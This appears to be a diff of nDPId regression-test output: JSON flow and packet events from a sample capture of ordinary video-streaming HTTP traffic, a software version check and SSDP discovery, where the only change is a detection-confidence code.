-00979{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1080,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157433,"flow_last_seen":1467353157433,"flow_idle_time":7580000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":335,"flow_avg_l4_payload_len":335,"midstream":1,"thread_ts_msec":1467353157433,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/2efc8cd5fbe0f4ee498fb1c2fc1de8b6\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?qyid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&qypid=2012","code":0,"content_type":"","user_agent":"HCDNClient_WINPC;libcurl\/7.26.0 OpenSSL\/1.0.1g zlib\/1.2.5;QK\/10.0.0.293"}} +00979{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1080,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157433,"flow_last_seen":1467353157433,"flow_idle_time":7580000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":335,"flow_avg_l4_payload_len":335,"midstream":1,"thread_ts_msec":1467353157433,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/2efc8cd5fbe0f4ee498fb1c2fc1de8b6\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?qyid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&qypid=2012","code":0,"content_type":"","user_agent":"HCDNClient_WINPC;libcurl\/7.26.0 OpenSSL\/1.0.1g zlib\/1.2.5;QK\/10.0.0.293"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1081,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157468,"flow_last_seen":1467353157468,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353157468,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1081,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1467353157468,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353157468,"pkt":"TF4M6gNlABxCjnAxCABFAAOkD3JAAIAG2tjAqHMIymwO7MU9AFA84A6MMfAazlAYQTez3QAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjM6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTI3NTU4JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1ODg3NCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNTcwNDYmc2g9JnNxPSZzdz0mdD0zcSZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} -01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1081,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157468,"flow_last_seen":1467353157468,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353157468,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353157046&sh=&sq=&sw=&t=3q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1081,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157468,"flow_last_seen":1467353157468,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353157468,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353157046&sh=&sq=&sw=&t=3q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 01074{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1082,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1467353157475,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":517,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":517,"pkt_l4_len":483,"thread_ts_msec":1467353157475,"pkt":"ABxCjnAxTF4M6gNlCABFAAH3iDRAADMGDUtvzg0DwKhzCABQxTzrMASW\/8Wiw1AYAB\/SLQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LUxlbmd0aDogMjkwDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQp7InQiOiJPVkVSU0VBfFRXX0hpTmV0LTExOC4xNjMuOC45MCIsInoiOiJ0YWliZWlfb3RoZXIiLCJoIjoiLTcyIiwibCI6Imh0dHA6Ly8yMjMuMjYuMTA2LjY2L3ZpZGVvcy92MC8yMDE2MDYyNS9hNS9iZi84ZGU5YmI5NDY5NzJhODg1ODlkMTY2Nzg2MjI5MjEzMC5mNHY\/a2V5PTA3ZWVmMTgyMWUyMzc5ZDMxMzZmZmUxNjA4MjE4NWJhMiZzcmM9aXFpeWkuY29tJnF5aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcXlwaWQ9MjAxMiZ1dWlkPTc2YTMwODVhLTU3NzYwODQ0LThiIiwiZSI6IjAifQ=="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1083,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157509,"flow_last_seen":1467353157509,"flow_idle_time":7580000,"flow_min_l4_payload_len":403,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":403,"midstream":1,"thread_ts_msec":1467353157509,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00992{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1083,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1467353157509,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":457,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":457,"pkt_l4_len":423,"thread_ts_msec":1467353157509,"pkt":"TF4M6gNlABxCjnAxCABFAAG7D3xAAIAGbLPAqHMI3xpqQsU+AFB482xgj\/e7VVAYAQRcuQAAR0VUIC92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2P2tleT0wN2VlZjE4MjFlMjM3OWQzMTM2ZmZlMTYwODIxODViYTImc3JjPWlxaXlpLmNvbSZxeWlkPWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnF5cGlkPTIwMTImdXVpZD03NmEzMDg1YS01Nzc2MDg0NC04YiBIVFRQLzEuMQ0KSG9zdDogMjIzLjI2LjEwNi42Ng0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogemgtY24NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEhDRE5DbGllbnRfV0lOUEM7bGliY3VybC83LjI2LjAgT3BlblNTTC8xLjAuMWcgemxpYi8xLjIuNTtRSy8xMC4wLjAuMjkzDQpSYW5nZTogYnl0ZXM9MzQyNDI1Ni04MDU3MDIzDQoNCg=="} -01136{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1083,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157509,"flow_last_seen":1467353157509,"flow_idle_time":7580000,"flow_min_l4_payload_len":403,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":403,"midstream":1,"thread_ts_msec":1467353157509,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&qyid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&qypid=2012&uuid=76a3085a-57760844-8b","code":0,"content_type":"","user_agent":"HCDNClient_WINPC;libcurl\/7.26.0 OpenSSL\/1.0.1g zlib\/1.2.5;QK\/10.0.0.293"}} +01136{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1083,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157509,"flow_last_seen":1467353157509,"flow_idle_time":7580000,"flow_min_l4_payload_len":403,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":403,"midstream":1,"thread_ts_msec":1467353157509,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&qyid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&qypid=2012&uuid=76a3085a-57760844-8b","code":0,"content_type":"","user_agent":"HCDNClient_WINPC;libcurl\/7.26.0 OpenSSL\/1.0.1g zlib\/1.2.5;QK\/10.0.0.293"}} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1084,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1467353157533,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353157533,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5zsFAADMGa3TKbA7swKhzCABQxT0x8BrOPOASCFAYACB8+QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU3IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 01074{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1085,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1467353157718,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":517,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":517,"pkt_l4_len":483,"thread_ts_msec":1467353157718,"pkt":"ABxCjnAxTF4M6gNlCABFAAH3iDVAADMGDUpvzg0DwKhzCABQxTzrMASW\/8Wiw1AYAB\/SLQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LUxlbmd0aDogMjkwDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQp7InQiOiJPVkVSU0VBfFRXX0hpTmV0LTExOC4xNjMuOC45MCIsInoiOiJ0YWliZWlfb3RoZXIiLCJoIjoiLTcyIiwibCI6Imh0dHA6Ly8yMjMuMjYuMTA2LjY2L3ZpZGVvcy92MC8yMDE2MDYyNS9hNS9iZi84ZGU5YmI5NDY5NzJhODg1ODlkMTY2Nzg2MjI5MjEzMC5mNHY\/a2V5PTA3ZWVmMTgyMWUyMzc5ZDMxMzZmZmUxNjA4MjE4NWJhMiZzcmM9aXFpeWkuY29tJnF5aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcXlwaWQ9MjAxMiZ1dWlkPTc2YTMwODVhLTU3NzYwODQ0LThiIiwiZSI6IjAifQ=="} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1086,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1467353158696,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353158696,"pkt":"AQBef\/\/6GF4PUugBCABFAAChLHIAAAER1v7AqAU57\/\/\/+ukAB2wAjbKhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353159222,"flow_last_seen":1467353159222,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353159222,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00811{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1467353159222,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":323,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":323,"pkt_l4_len":289,"thread_ts_msec":1467353159222,"pkt":"TF4M6gNlKDc3Alz6CABFAAE1+vRAAEAGNqjAqAUPROn9hf5nAFAhJnFt6cGPtIAYEBWfeAAAAQEICiYbloUrIzeaR0VUIC9jb21NYWdpY2FuQXBpL2luZGV4LnBocC9Ub29sQm94L3ZlcnNpb24gSFRUUC8xLjENCkhvc3Q6IGFwaS5tYWdpY2Fuc29mdC5jb20NCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLXR3DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1hZ2ljYW4gKHVua25vd24gdmVyc2lvbikgQ0ZOZXR3b3JrLzcyMC41LjcgRGFyd2luLzE0LjUuMCAoeDg2XzY0KQ0KDQo="} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1087,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353159222,"flow_last_seen":1467353159222,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353159222,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/index.php\/ToolBox\/version","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1087,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353159222,"flow_last_seen":1467353159222,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353159222,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/index.php\/ToolBox\/version","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}} 00901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1467353159428,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":390,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":390,"pkt_l4_len":356,"thread_ts_msec":1467353159428,"pkt":"KDc3Alz6TF4M6gNlCABFAAF4t91AADUGhHxE6f2FwKgFDwBQ\/mfpwY+0ISZyboAYABs\/NQAAAQEICisjOHomG5aFSFRUUC8xLjEgNTAyIEJhZCBHYXRld2F5DQpTZXJ2ZXI6IE1TZXJ2ZXIgMS4yLjINCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDU6NDY6MjUgR01UDQpDb250ZW50LVR5cGU6IHRleHQvaHRtbA0KQ29udGVudC1MZW5ndGg6IDE2Ng0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KDQo8aHRtbD4NCjxoZWFkPjx0aXRsZT41MDIgQmFkIEdhdGV3YXk8L3RpdGxlPjwvaGVhZD4NCjxib2R5IGJnY29sb3I9IndoaXRlIj4NCjxjZW50ZXI+PGgxPjUwMiBCYWQgR2F0ZXdheTwvaDE+PC9jZW50ZXI+DQo8aHI+PGNlbnRlcj5uZ2lueDwvY2VudGVyPg0KPC9ib2R5Pg0KPC9odG1sPg0K"} 00955{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1467353159731,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":430,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":430,"pkt_l4_len":396,"thread_ts_msec":1467353159731,"pkt":"TF4M6gNlABxCjnAxCABFAAGgFhZAAIAGZjTAqHMI3xpqQsU+AFB4823zkD5tZ1AYAQS6ZwAAR0VUIC92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2Y3JjP2tleT0wN2VlZjE4MjFlMjM3OWQzMTM2ZmZlMTYwODIxODViYTImc3JjPWlxaXlpLmNvbSZxeWlkPWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnF5cGlkPTIwMTImdXVpZD03NmEzMDg1YS01Nzc2MDg0NC04YiBIVFRQLzEuMQ0KSG9zdDogMjIzLjI2LjEwNi42Ng0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogemgtY24NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEhDRE5DbGllbnRfV0lOUEM7bGliY3VybC83LjI2LjAgT3BlblNTTC8xLjAuMWcgemxpYi8xLjIuNTtRSy8xMC4wLjAuMjkzDQoNCg=="} 00971{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1090,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1467353159746,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":443,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":443,"pkt_l4_len":409,"thread_ts_msec":1467353159746,"pkt":"ABxCjnAxTF4M6gNlCABFAAGtzXdAADgG9sXfGmpCwKhzCABQxT6QPm1nePNva1AYACEkXQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU5IEdNVA0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0NCkNvbnRlbnQtTGVuZ3RoOiA3Mg0KTGFzdC1Nb2RpZmllZDogU2F0LCAyNSBKdW4gMjAxNiAyMDo0Nzo0OCBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkVUYWc6ICI1NzZlZWRmNC00OCINCkV4cGlyZXM6IFNhdCwgMDEgSnVsIDIwMTcgMDY6MDU6NTkgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTMxNTM2MDAwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KDQoBAAAAjem7lGlyqIWJ0WZ4YikhMAAAAADA8HoAAAAAAJ0fBgCdHwYAAAAgAABAAACfagIAEAAAABkBmvdUqrt6QK4cKbQBDrk="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1091,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353160157,"flow_last_seen":1467353160157,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353160157,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":63930,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1091,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1467353160157,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1467353160157,"pkt":"AQBef\/\/6bEAIlAI6CABFAAClHaUAAAER5dDAqAUw7\/\/\/+vm6B2wAkVW0TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1091,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353160157,"flow_last_seen":1467353160157,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353160157,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":63930,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 